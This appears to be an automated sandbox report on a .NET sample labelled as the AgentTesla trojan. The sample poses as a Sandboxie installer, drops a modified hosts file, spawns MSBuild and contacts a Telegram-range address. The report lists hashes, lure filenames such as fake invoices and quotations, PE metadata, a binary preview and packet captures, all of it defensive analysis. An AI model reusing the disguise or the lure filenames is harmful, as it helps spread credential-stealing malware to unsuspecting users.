                                                                                                                                      SHA1:ABCAE05EE61EE6292003AABD8C80583FA49EDDA2
                                                                                                                                      SHA-256:2CA7CF7146FB8209CF3C6CECB1C5AA154C61E046DC07AFA05E8158F2C0DDE2F6
                                                                                                                                      SHA-512:2D85A81D708ECC8AF9A1273143C94DA84E632F1E595E22F54B867225105A1D0A44F918F0FAE6F1EB15ECF69D75B6F4616699776A16A2AA8B5282100FD15CA74C
                                                                                                                                      Malicious:true
                                                                                                                                      Antivirus:
                                                                                                                                      • Antivirus: Virustotal, Detection: 0%, Browse
                                                                                                                                      • Antivirus: Metadefender, Detection: 0%, Browse
                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                      Joe Sandbox View:
                                                                                                                                      • Filename: sublime.exe, Detection: malicious, Browse
                                                                                                                                      • Filename: Pnkfvrn.exe, Detection: malicious, Browse
                                                                                                                                      • Filename: ( StmItaly S.R.L. Citazione ).exe, Detection: malicious, Browse
                                                                                                                                      • Filename: #U65b0#U547d#U4ee4___xls.exe, Detection: malicious, Browse
                                                                                                                                      • Filename: SALISBUSRY ITEMS - PO-1128-2022.exe, Detection: malicious, Browse
                                                                                                                                      • Filename: invoices.exe, Detection: malicious, Browse
                                                                                                                                      • Filename: SecuriteInfo.com.W32.AIDetectNet.01.26448.exe, Detection: malicious, Browse
                                                                                                                                      • Filename: product list .exe, Detection: malicious, Browse
                                                                                                                                      • Filename: invoice.exe, Detection: malicious, Browse
                                                                                                                                      • Filename: swift.exe, Detection: malicious, Browse
                                                                                                                                      • Filename: QtPqvVRIQx.exe, Detection: malicious, Browse
                                                                                                                                      • Filename: Diagram Image.exe, Detection: malicious, Browse
                                                                                                                                      • Filename: 8C363578 & 8C366195.exe, Detection: malicious, Browse
                                                                                                                                      • Filename: z_CC front and back jpg.exe, Detection: malicious, Browse
                                                                                                                                      • Filename: 8SgJVjkAua.exe, Detection: malicious, Browse
                                                                                                                                      • Filename: IMUSHH30643885.exe, Detection: malicious, Browse
                                                                                                                                      • Filename: xyUZcqbbfL.exe, Detection: malicious, Browse
                                                                                                                                      • Filename: RFQ06112020149.PDF.exe, Detection: malicious, Browse
                                                                                                                                      • Filename: CertUtil.exe, Detection: malicious, Browse
                                                                                                                                      • Filename: Quotation9011332.pdf.exe, Detection: malicious, Browse
                                                                                                                                      Reputation:moderate, very likely benign file
                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....Z.Z.........."...0..|...B......n.... ........@.. ....................................`.....................................O........>..............`>.......................................................... ............... ..H............text....z... ...|.................. ..`.rsrc....>.......@...~..............@..@.reloc..............................@..B................P.......H.......8)...................|.........................................*.{.......*v.(=....r...p({...-..+..}....*....0..%........(....-..*....(z.....&..}.........*.*....................0..5........(....-..*.-.r+..ps>...z.....i(z.....&..}.........*.*............%......>....(?...(....*N..(@....oA...(....*:...(B...(....*:...(C...(....**....(....*....0..G........(....,..*..(....-...}.....*.r...p(x...&.(v.....}......&..}.........*.*..........7.......0..f........-.r7..ps>...z .....

                                                                                                                                      C:\Windows\System32\drivers\etc\hosts

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):835
                                                                                                                                      Entropy (8bit):4.694294591169137
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:QWDZh+ragzMZfuMMs1L/JU5fFCkK8T1rTt8:vDZhyoZWM9rU5fFcP
                                                                                                                                      MD5:6EB47C1CF858E25486E42440074917F2
                                                                                                                                      SHA1:6A63F93A95E1AE831C393A97158C526A4FA0FAAE
                                                                                                                                      SHA-256:9B13A3EA948A1071A81787AAC1930B89E30DF22CE13F8FF751F31B5D83E79FFB
                                                                                                                                      SHA-512:08437AB32E7E905EB11335E670CDD5D999803390710ED39CBC31A2D3F05868D5D0E5D051CCD7B06A85BB466932F99A220463D27FAC29116D241E8ADAC495FA2F
                                                                                                                                      Malicious:true
                                                                                                                                      Preview:# Copyright (c) 1993-2009 Microsoft Corp...#..# This is a sample HOSTS file used by Microsoft TCP/IP for Windows...#..# This file contains the mappings of IP addresses to host names. Each..# entry should be kept on an individual line. The IP address should..# be placed in the first column followed by the corresponding host name...# The IP address and the host name should be separated by at least one..# space...#..# Additionally, comments (such as these) may be inserted on individual..# lines or following the machine name denoted by a '#' symbol...#..# For example:..#..# 102.54.94.97 rhino.acme.com # source server..# 38.25.63.10 x.acme.com # x client host....# localhost name resolution is handled within DNS itself...#.127.0.0.1 localhost..#.::1 localhost....127.0.0.1

                                                                                                                                      \Device\ConDrv

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Roaming\ykVBUY\ykVBUY.exe
                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):298
                                                                                                                                      Entropy (8bit):4.943030742860529
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:6:zx3M1tFAbQtU1R30qyMstwYVoRRZBXVN+J0fFdCsq2UTiMdH8stCal+n:zK13I30ZMt9BFN+QdCT2UftCM+
                                                                                                                                      MD5:6A9888952541A41F033EB114C24DC902
                                                                                                                                      SHA1:41903D7C8F31013C44572E09D97B9AAFBBCE77E6
                                                                                                                                      SHA-256:41A61D0084CD7884BEA1DF02ED9213CB8C83F4034F5C8156FC5B06D6A3E133CE
                                                                                                                                      SHA-512:E6AC898E67B4052375FDDFE9894B26D504A7827917BF3E02772CFF45C3FA7CC5E0EFFDC701D208E0DB89F05E42F195B1EC890F316BEE5CB8239AB45444DAA65E
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:Microsoft (R) Build Engine version 4.7.3056.0..[Microsoft .NET Framework, version 4.0.30319.42000]..Copyright (C) Microsoft Corporation. All rights reserved.....MSBUILD : error MSB1003: Specify a project or solution file. The current working directory does not contain a project or solution file...

                                                                                                                                      Static File Info

                                                                                                                                      General

                                                                                                                                      File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                      Entropy (8bit):7.963790862015621
                                                                                                                                      TrID:
                                                                                                                                      • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                                                                                      • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                                                                                      • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                                                                      • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                                                      • DOS Executable Generic (2002/1) 0.01%
                                                                                                                                      File name:SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe
                                                                                                                                      File size:689664
                                                                                                                                      MD5:5d5f37a7cf3a9ff4277b3a9dc2c4b9d2
                                                                                                                                      SHA1:1a115c8a1761ef2a2cf61d854d1d2c201c902d53
                                                                                                                                      SHA256:31941c96fa470de35d08fd8bdc215c2ff2cbeb82dd72e91aafa563c08af7c969
                                                                                                                                      SHA512:64d959d7bc5987822a6639bb475280a7f6969c520d64e2b9d03cd3a776e4d74c0d350cc1388cff293dc9c546646860a32de3fd912ea3d2c4ae1d5047af9afc82
                                                                                                                                      SSDEEP:12288:22L2IOI6QPAc9lIZx2tDPG2xMN1HHG05LZ524R8douFvjkntY9DTVYCsK5iZ1:22j6gz92AtDPGaMnnRBZ7+1F70481Z
                                                                                                                                      TLSH:8DE4126C66C64332EF7931F3F2F2498127367D6EB032E289ECA212DDC9927431555A27
                                                                                                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...$2................0..>...F......:]... ...`....@.. ...............................x....@................................

                                                                                                                                      File Icon

                                                                                                                                      Icon Hash:0b3b5bb333d38963

                                                                                                                                      Static PE Info

                                                                                                                                      General

                                                                                                                                      Entrypoint:0x4a5d3a
                                                                                                                                      Entrypoint Section:.text
                                                                                                                                      Digitally signed:false
                                                                                                                                      Imagebase:0x400000
                                                                                                                                      Subsystem:windows gui
                                                                                                                                      Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                                                                                                                      DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                                                                                                      Time Stamp:0xCED63224 [Mon Dec 18 16:53:56 2079 UTC]
                                                                                                                                      TLS Callbacks:
                                                                                                                                      CLR (.Net) Version:v4.0.30319
                                                                                                                                      OS Version Major:4
                                                                                                                                      OS Version Minor:0
                                                                                                                                      File Version Major:4
                                                                                                                                      File Version Minor:0
                                                                                                                                      Subsystem Version Major:4
                                                                                                                                      Subsystem Version Minor:0
                                                                                                                                      Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                                                                                      Entrypoint Preview

                                                                                                                                      Instruction
                                                                                                                                      jmp dword ptr [00402000h]
                                                                                                                                      add byte ptr [eax], al
                                                                                                                                      add byte ptr [eax], al
                                                                                                                                      add byte ptr [eax], al
                                                                                                                                      add byte ptr [eax], al
                                                                                                                                      add byte ptr [eax], al
                                                                                                                                      add byte ptr [eax], al
                                                                                                                                      add byte ptr [eax], al
                                                                                                                                      add byte ptr [eax], al
                                                                                                                                      add byte ptr [eax], al
                                                                                                                                      add byte ptr [eax], al
                                                                                                                                      add byte ptr [eax], al
                                                                                                                                      add byte ptr [eax], al
                                                                                                                                      add byte ptr [eax], al
                                                                                                                                      add byte ptr [eax], al
                                                                                                                                      add byte ptr [eax], al
                                                                                                                                      add byte ptr [eax], al
                                                                                                                                      add byte ptr [eax], al
                                                                                                                                      add byte ptr [eax], al
                                                                                                                                      add byte ptr [eax], al
                                                                                                                                      add byte ptr [eax], al
                                                                                                                                      add byte ptr [eax], al
                                                                                                                                      add byte ptr [eax], al
                                                                                                                                      add byte ptr [eax], al
                                                                                                                                      add byte ptr [eax], al
                                                                                                                                      add byte ptr [eax], al
                                                                                                                                      add byte ptr [eax], al
                                                                                                                                      add byte ptr [eax], al
                                                                                                                                      add byte ptr [eax], al
                                                                                                                                      add byte ptr [eax], al
                                                                                                                                      add byte ptr [eax], al
                                                                                                                                      add byte ptr [eax], al
                                                                                                                                      add byte ptr [eax], al
                                                                                                                                      add byte ptr [eax], al
                                                                                                                                      add byte ptr [eax], al
                                                                                                                                      add byte ptr [eax], al
                                                                                                                                      add byte ptr [eax], al
                                                                                                                                      add byte ptr [eax], al
                                                                                                                                      add byte ptr [eax], al
                                                                                                                                      add byte ptr [eax], al
                                                                                                                                      add byte ptr [eax], al
                                                                                                                                      add byte ptr [eax], al
                                                                                                                                      add byte ptr [eax], al
                                                                                                                                      add byte ptr [eax], al
                                                                                                                                      add byte ptr [eax], al
                                                                                                                                      add byte ptr [eax], al
                                                                                                                                      add byte ptr [eax], al
                                                                                                                                      add byte ptr [eax], al
                                                                                                                                      add byte ptr [eax], al
                                                                                                                                      add byte ptr [eax], al
                                                                                                                                      add byte ptr [eax], al
                                                                                                                                      add byte ptr [eax], al
                                                                                                                                      add byte ptr [eax], al
                                                                                                                                      add byte ptr [eax], al
                                                                                                                                      add byte ptr [eax], al
                                                                                                                                      add byte ptr [eax], al
                                                                                                                                      add byte ptr [eax], al
                                                                                                                                      add byte ptr [eax], al
                                                                                                                                      add byte ptr [eax], al
                                                                                                                                      add byte ptr [eax], al
                                                                                                                                      add byte ptr [eax], al
                                                                                                                                      add byte ptr [eax], al
                                                                                                                                      add byte ptr [eax], al
                                                                                                                                      add byte ptr [eax], al
                                                                                                                                      add byte ptr [eax], al
                                                                                                                                      add byte ptr [eax], al
                                                                                                                                      add byte ptr [eax], al
                                                                                                                                      add byte ptr [eax], al
                                                                                                                                      add byte ptr [eax], al
                                                                                                                                      add byte ptr [eax], al
                                                                                                                                      add byte ptr [eax], al
                                                                                                                                      add byte ptr [eax], al
                                                                                                                                      add byte ptr [eax], al
                                                                                                                                      add byte ptr [eax], al
                                                                                                                                      add byte ptr [eax], al
                                                                                                                                      add byte ptr [eax], al
                                                                                                                                      add byte ptr [eax], al
                                                                                                                                      add byte ptr [eax], al
                                                                                                                                      add byte ptr [eax], al
                                                                                                                                      add byte ptr [eax], al
                                                                                                                                      add byte ptr [eax], al
                                                                                                                                      add byte ptr [eax], al
                                                                                                                                      add byte ptr [eax], al
                                                                                                                                      add byte ptr [eax], al
                                                                                                                                      add byte ptr [eax], al
                                                                                                                                      add byte ptr [eax], al
                                                                                                                                      add byte ptr [eax], al
                                                                                                                                      add byte ptr [eax], al
                                                                                                                                      add byte ptr [eax], al
                                                                                                                                      add byte ptr [eax], al
                                                                                                                                      add byte ptr [eax], al
                                                                                                                                      add byte ptr [eax], al
                                                                                                                                      add byte ptr [eax], al
                                                                                                                                      add byte ptr [eax], al
                                                                                                                                      add byte ptr [eax], al
                                                                                                                                      add byte ptr [eax], al
                                                                                                                                      add byte ptr [eax], al
                                                                                                                                      add byte ptr [eax], al

                                                                                                                                      Data Directories

                                                                                                                                      NameVirtual AddressVirtual Size Is in Section
                                                                                                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0xa5ce80x4f.text
                                                                                                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0xa60000x420e.rsrc
                                                                                                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0xac0000xc.reloc
                                                                                                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0xa5ccc0x1c.text
                                                                                                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                      IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                                                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                                                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                      Sections

                                                                                                                                      NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                      .text0x20000xa3d400xa3e00False0.965679526602data7.97974117818IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                                                                                      .rsrc0xa60000x420e0x4400False0.284122242647data5.03040094587IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                      .reloc0xac0000xc0x200False0.044921875data0.101910425663IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                                                      Resources

                                                                                                                                      NameRVASizeTypeLanguageCountry
                                                                                                                                      RT_ICON0xa61a80x468GLS_BINARY_LSB_FIRST
                                                                                                                                      RT_ICON0xa66100x10a8dBase IV DBT of @.DBF, block length 4096, next free block index 40, next free block 4294111472, next used block 4294178293
                                                                                                                                      RT_ICON0xa76b80x25a8dBase IV DBT of `.DBF, block length 9216, next free block index 40, next free block 4294177779, next used block 4294111986
                                                                                                                                      RT_GROUP_ICON0xa9c600x30data
                                                                                                                                      RT_VERSION0xa9c900x394data
                                                                                                                                      RT_MANIFEST0xaa0240x1eaXML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

                                                                                                                                      Imports

                                                                                                                                      DLLImport
                                                                                                                                      mscoree.dll_CorExeMain

                                                                                                                                      Version Infos

                                                                                                                                      DescriptionData
                                                                                                                                      Translation0x0000 0x04b0
                                                                                                                                      LegalCopyrightCopyright 2020-2021 by David Xanatos (xanasoft.com)
                                                                                                                                      Assembly Version1.0.0.0
                                                                                                                                      InternalNameGeneric.exe
                                                                                                                                      FileVersion1.0.0.0
                                                                                                                                      CompanyNamesandboxie-plus.com
                                                                                                                                      LegalTrademarks
                                                                                                                                      Comments
                                                                                                                                      ProductNameSandboxie
                                                                                                                                      ProductVersion1.0.0.0
                                                                                                                                      FileDescriptionSandboxie Installer
                                                                                                                                      OriginalFilenameGeneric.exe

                                                                                                                                      Network Behavior

                                                                                                                                      Network Port Distribution

                                                                                                                                      TCP Packets

                                                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                                                      May 4, 2022 14:37:14.472268105 CEST49717443192.168.2.4131.253.33.200
                                                                                                                                      May 4, 2022 14:37:14.472575903 CEST49717443192.168.2.4131.253.33.200
                                                                                                                                      May 4, 2022 14:37:14.472666979 CEST49717443192.168.2.4131.253.33.200
                                                                                                                                      May 4, 2022 14:37:14.472697973 CEST49717443192.168.2.4131.253.33.200
                                                                                                                                      May 4, 2022 14:37:14.472771883 CEST49717443192.168.2.4131.253.33.200
                                                                                                                                      May 4, 2022 14:37:14.472793102 CEST49717443192.168.2.4131.253.33.200
                                                                                                                                      May 4, 2022 14:37:14.472851038 CEST49717443192.168.2.4131.253.33.200
                                                                                                                                      May 4, 2022 14:37:14.472878933 CEST49717443192.168.2.4131.253.33.200
                                                                                                                                      May 4, 2022 14:37:14.472929001 CEST49717443192.168.2.4131.253.33.200
                                                                                                                                      May 4, 2022 14:37:14.496618986 CEST44349717131.253.33.200192.168.2.4
                                                                                                                                      May 4, 2022 14:37:14.496674061 CEST44349717131.253.33.200192.168.2.4
                                                                                                                                      May 4, 2022 14:37:14.496701956 CEST44349717131.253.33.200192.168.2.4
                                                                                                                                      May 4, 2022 14:37:14.496731997 CEST44349717131.253.33.200192.168.2.4
                                                                                                                                      May 4, 2022 14:37:14.496757984 CEST44349717131.253.33.200192.168.2.4
                                                                                                                                      May 4, 2022 14:37:14.496786118 CEST44349717131.253.33.200192.168.2.4
                                                                                                                                      May 4, 2022 14:37:14.496814013 CEST44349717131.253.33.200192.168.2.4
                                                                                                                                      May 4, 2022 14:37:14.496839046 CEST44349717131.253.33.200192.168.2.4
                                                                                                                                      May 4, 2022 14:37:14.496865988 CEST44349717131.253.33.200192.168.2.4
                                                                                                                                      May 4, 2022 14:37:14.496892929 CEST44349717131.253.33.200192.168.2.4
                                                                                                                                      May 4, 2022 14:37:14.496920109 CEST44349717131.253.33.200192.168.2.4
                                                                                                                                      May 4, 2022 14:37:14.496948957 CEST44349717131.253.33.200192.168.2.4
                                                                                                                                      May 4, 2022 14:37:14.496974945 CEST44349717131.253.33.200192.168.2.4
                                                                                                                                      May 4, 2022 14:37:14.497000933 CEST44349717131.253.33.200192.168.2.4
                                                                                                                                      May 4, 2022 14:37:14.497029066 CEST44349717131.253.33.200192.168.2.4
                                                                                                                                      May 4, 2022 14:37:14.497054100 CEST44349717131.253.33.200192.168.2.4
                                                                                                                                      May 4, 2022 14:37:14.497080088 CEST44349717131.253.33.200192.168.2.4
                                                                                                                                      May 4, 2022 14:37:14.497107029 CEST44349717131.253.33.200192.168.2.4
                                                                                                                                      May 4, 2022 14:37:14.497157097 CEST44349717131.253.33.200192.168.2.4
                                                                                                                                      May 4, 2022 14:37:14.497261047 CEST44349717131.253.33.200192.168.2.4
                                                                                                                                      May 4, 2022 14:37:14.497289896 CEST44349717131.253.33.200192.168.2.4
                                                                                                                                      May 4, 2022 14:37:14.497315884 CEST44349717131.253.33.200192.168.2.4
                                                                                                                                      May 4, 2022 14:37:14.497379065 CEST44349717131.253.33.200192.168.2.4
                                                                                                                                      May 4, 2022 14:37:14.497409105 CEST44349717131.253.33.200192.168.2.4
                                                                                                                                      May 4, 2022 14:37:14.497435093 CEST44349717131.253.33.200192.168.2.4
                                                                                                                                      May 4, 2022 14:37:14.497618914 CEST44349717131.253.33.200192.168.2.4
                                                                                                                                      May 4, 2022 14:37:14.497648001 CEST44349717131.253.33.200192.168.2.4
                                                                                                                                      May 4, 2022 14:37:14.497674942 CEST44349717131.253.33.200192.168.2.4
                                                                                                                                      May 4, 2022 14:37:14.497704029 CEST44349717131.253.33.200192.168.2.4
                                                                                                                                      May 4, 2022 14:37:14.497733116 CEST44349717131.253.33.200192.168.2.4
                                                                                                                                      May 4, 2022 14:37:14.497759104 CEST44349717131.253.33.200192.168.2.4
                                                                                                                                      May 4, 2022 14:37:14.497786045 CEST44349717131.253.33.200192.168.2.4
                                                                                                                                      May 4, 2022 14:37:14.497812986 CEST44349717131.253.33.200192.168.2.4
                                                                                                                                      May 4, 2022 14:37:14.497894049 CEST44349717131.253.33.200192.168.2.4
                                                                                                                                      May 4, 2022 14:37:14.497922897 CEST44349717131.253.33.200192.168.2.4
                                                                                                                                      May 4, 2022 14:37:14.497951984 CEST44349717131.253.33.200192.168.2.4
                                                                                                                                      May 4, 2022 14:37:14.497977972 CEST44349717131.253.33.200192.168.2.4
                                                                                                                                      May 4, 2022 14:37:14.498004913 CEST44349717131.253.33.200192.168.2.4
                                                                                                                                      May 4, 2022 14:37:14.498033047 CEST44349717131.253.33.200192.168.2.4
                                                                                                                                      May 4, 2022 14:37:14.498059034 CEST44349717131.253.33.200192.168.2.4
                                                                                                                                      May 4, 2022 14:37:14.498137951 CEST44349717131.253.33.200192.168.2.4
                                                                                                                                      May 4, 2022 14:37:14.498167038 CEST44349717131.253.33.200192.168.2.4
                                                                                                                                      May 4, 2022 14:37:14.498193026 CEST44349717131.253.33.200192.168.2.4
                                                                                                                                      May 4, 2022 14:37:14.498219967 CEST44349717131.253.33.200192.168.2.4
                                                                                                                                      May 4, 2022 14:37:14.498248100 CEST44349717131.253.33.200192.168.2.4
                                                                                                                                      May 4, 2022 14:37:14.498272896 CEST44349717131.253.33.200192.168.2.4
                                                                                                                                      May 4, 2022 14:37:14.498337030 CEST44349717131.253.33.200192.168.2.4
                                                                                                                                      May 4, 2022 14:37:14.498367071 CEST44349717131.253.33.200192.168.2.4
                                                                                                                                      May 4, 2022 14:37:14.498393059 CEST44349717131.253.33.200192.168.2.4
                                                                                                                                      May 4, 2022 14:37:14.498420954 CEST44349717131.253.33.200192.168.2.4
                                                                                                                                      May 4, 2022 14:37:14.498447895 CEST44349717131.253.33.200192.168.2.4
                                                                                                                                      May 4, 2022 14:37:14.498473883 CEST44349717131.253.33.200192.168.2.4
                                                                                                                                      May 4, 2022 14:37:14.498501062 CEST44349717131.253.33.200192.168.2.4
                                                                                                                                      May 4, 2022 14:37:14.499952078 CEST44349717131.253.33.200192.168.2.4
                                                                                                                                      May 4, 2022 14:37:14.499979973 CEST44349717131.253.33.200192.168.2.4
                                                                                                                                      May 4, 2022 14:37:14.500051022 CEST44349717131.253.33.200192.168.2.4
                                                                                                                                      May 4, 2022 14:37:14.500159025 CEST49717443192.168.2.4131.253.33.200
                                                                                                                                      May 4, 2022 14:37:14.500176907 CEST44349717131.253.33.200192.168.2.4
                                                                                                                                      May 4, 2022 14:37:14.500258923 CEST49717443192.168.2.4131.253.33.200
                                                                                                                                      May 4, 2022 14:37:14.554722071 CEST44349717131.253.33.200192.168.2.4
                                                                                                                                      May 4, 2022 14:37:14.554894924 CEST49717443192.168.2.4131.253.33.200
                                                                                                                                      May 4, 2022 14:37:25.098345995 CEST49741443192.168.2.440.126.31.4
                                                                                                                                      May 4, 2022 14:37:25.098407984 CEST4434974140.126.31.4192.168.2.4
                                                                                                                                      May 4, 2022 14:37:25.098511934 CEST49741443192.168.2.440.126.31.4
                                                                                                                                      May 4, 2022 14:37:25.098990917 CEST49741443192.168.2.440.126.31.4
                                                                                                                                      May 4, 2022 14:37:25.099016905 CEST4434974140.126.31.4192.168.2.4
                                                                                                                                      May 4, 2022 14:37:25.144711018 CEST49743443192.168.2.440.126.31.4
                                                                                                                                      May 4, 2022 14:37:25.144762039 CEST4434974340.126.31.4192.168.2.4
                                                                                                                                      May 4, 2022 14:37:25.144856930 CEST49743443192.168.2.440.126.31.4
                                                                                                                                      May 4, 2022 14:37:25.145052910 CEST49743443192.168.2.440.126.31.4
                                                                                                                                      May 4, 2022 14:37:25.145071030 CEST4434974340.126.31.4192.168.2.4
                                                                                                                                      May 4, 2022 14:37:25.710009098 CEST49748443192.168.2.440.126.31.4
                                                                                                                                      May 4, 2022 14:37:25.710062027 CEST4434974840.126.31.4192.168.2.4
                                                                                                                                      May 4, 2022 14:37:25.710205078 CEST49748443192.168.2.440.126.31.4
                                                                                                                                      May 4, 2022 14:37:25.710541964 CEST49748443192.168.2.440.126.31.4
                                                                                                                                      May 4, 2022 14:37:25.710566998 CEST4434974840.126.31.4192.168.2.4
                                                                                                                                      May 4, 2022 14:37:27.166102886 CEST4967380192.168.2.493.184.220.29
                                                                                                                                      May 4, 2022 14:37:27.166165113 CEST4967280192.168.2.48.248.119.254
                                                                                                                                      May 4, 2022 14:37:27.535794020 CEST4967380192.168.2.493.184.220.29
                                                                                                                                      May 4, 2022 14:37:27.649444103 CEST4967280192.168.2.48.248.119.254
                                                                                                                                      May 4, 2022 14:37:28.206187963 CEST4967380192.168.2.493.184.220.29
                                                                                                                                      May 4, 2022 14:37:28.253160000 CEST4967280192.168.2.48.248.119.254
                                                                                                                                      May 4, 2022 14:37:29.409497023 CEST4967380192.168.2.493.184.220.29
                                                                                                                                      May 4, 2022 14:37:29.550045013 CEST4967280192.168.2.48.248.119.254
                                                                                                                                      May 4, 2022 14:37:31.909598112 CEST4967380192.168.2.493.184.220.29
                                                                                                                                      May 4, 2022 14:37:31.952646971 CEST4967280192.168.2.48.248.119.254
                                                                                                                                      May 4, 2022 14:37:36.847651005 CEST4967280192.168.2.48.248.119.254
                                                                                                                                      May 4, 2022 14:37:36.910098076 CEST4967380192.168.2.493.184.220.29
                                                                                                                                      May 4, 2022 14:37:46.457775116 CEST4967280192.168.2.48.248.119.254
                                                                                                                                      May 4, 2022 14:37:46.579255104 CEST4967380192.168.2.493.184.220.29
                                                                                                                                      May 4, 2022 14:37:58.174837112 CEST49743443192.168.2.440.126.31.4
                                                                                                                                      May 4, 2022 14:37:58.174870968 CEST49748443192.168.2.440.126.31.4
                                                                                                                                      May 4, 2022 14:37:58.175440073 CEST49741443192.168.2.440.126.31.4
                                                                                                                                      May 4, 2022 14:38:04.786576033 CEST49768443192.168.2.4149.154.167.220
                                                                                                                                      May 4, 2022 14:38:04.786614895 CEST44349768149.154.167.220192.168.2.4
                                                                                                                                      May 4, 2022 14:38:04.786755085 CEST49768443192.168.2.4149.154.167.220
                                                                                                                                      May 4, 2022 14:38:04.842015028 CEST49768443192.168.2.4149.154.167.220
                                                                                                                                      May 4, 2022 14:38:04.842041969 CEST44349768149.154.167.220192.168.2.4
                                                                                                                                      May 4, 2022 14:38:04.903723955 CEST44349768149.154.167.220192.168.2.4
                                                                                                                                      May 4, 2022 14:38:04.903877020 CEST49768443192.168.2.4149.154.167.220
                                                                                                                                      May 4, 2022 14:38:04.909331083 CEST49768443192.168.2.4149.154.167.220
                                                                                                                                      May 4, 2022 14:38:04.909349918 CEST44349768149.154.167.220192.168.2.4
                                                                                                                                      May 4, 2022 14:38:04.909682989 CEST44349768149.154.167.220192.168.2.4
                                                                                                                                      May 4, 2022 14:38:04.959192038 CEST49768443192.168.2.4149.154.167.220
                                                                                                                                      May 4, 2022 14:38:05.352157116 CEST49768443192.168.2.4149.154.167.220
                                                                                                                                      May 4, 2022 14:38:05.378235102 CEST44349768149.154.167.220192.168.2.4
                                                                                                                                      May 4, 2022 14:38:05.379873037 CEST49768443192.168.2.4149.154.167.220
                                                                                                                                      May 4, 2022 14:38:05.420505047 CEST44349768149.154.167.220192.168.2.4
                                                                                                                                      May 4, 2022 14:38:05.750082970 CEST44349768149.154.167.220192.168.2.4
                                                                                                                                      May 4, 2022 14:38:05.750214100 CEST44349768149.154.167.220192.168.2.4
                                                                                                                                      May 4, 2022 14:38:05.750293970 CEST49768443192.168.2.4149.154.167.220
                                                                                                                                      May 4, 2022 14:38:05.751815081 CEST49768443192.168.2.4149.154.167.220
                                                                                                                                      May 4, 2022 14:38:05.959731102 CEST4971680192.168.2.467.26.81.254
                                                                                                                                      May 4, 2022 14:38:05.981616020 CEST804971667.26.81.254192.168.2.4
                                                                                                                                      May 4, 2022 14:38:05.981736898 CEST4971680192.168.2.467.26.81.254
                                                                                                                                      May 4, 2022 14:38:11.382108927 CEST804971893.184.220.29192.168.2.4
                                                                                                                                      May 4, 2022 14:38:11.382328033 CEST4971880192.168.2.493.184.220.29
                                                                                                                                      May 4, 2022 14:38:41.953197956 CEST805460713.248.245.213192.168.2.4
                                                                                                                                      May 4, 2022 14:38:41.953289032 CEST5460780192.168.2.413.248.245.213
                                                                                                                                      May 4, 2022 14:38:50.042427063 CEST8054726142.250.203.110192.168.2.4
                                                                                                                                      May 4, 2022 14:38:50.042542934 CEST5472680192.168.2.4142.250.203.110
                                                                                                                                      May 4, 2022 14:39:12.821942091 CEST804971893.184.220.29192.168.2.4
                                                                                                                                      May 4, 2022 14:39:12.822041035 CEST4971880192.168.2.493.184.220.29
                                                                                                                                      May 4, 2022 14:39:21.294856071 CEST44349717131.253.33.200192.168.2.4
                                                                                                                                      May 4, 2022 14:39:24.164635897 CEST804971893.184.220.29192.168.2.4
                                                                                                                                      May 4, 2022 14:39:24.164720058 CEST4971880192.168.2.493.184.220.29

                                                                                                                                      UDP Packets

                                                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                                                      May 4, 2022 14:38:04.750358105 CEST6075853192.168.2.48.8.8.8
                                                                                                                                      May 4, 2022 14:38:04.768125057 CEST53607588.8.8.8192.168.2.4

                                                                                                                                      DNS Queries

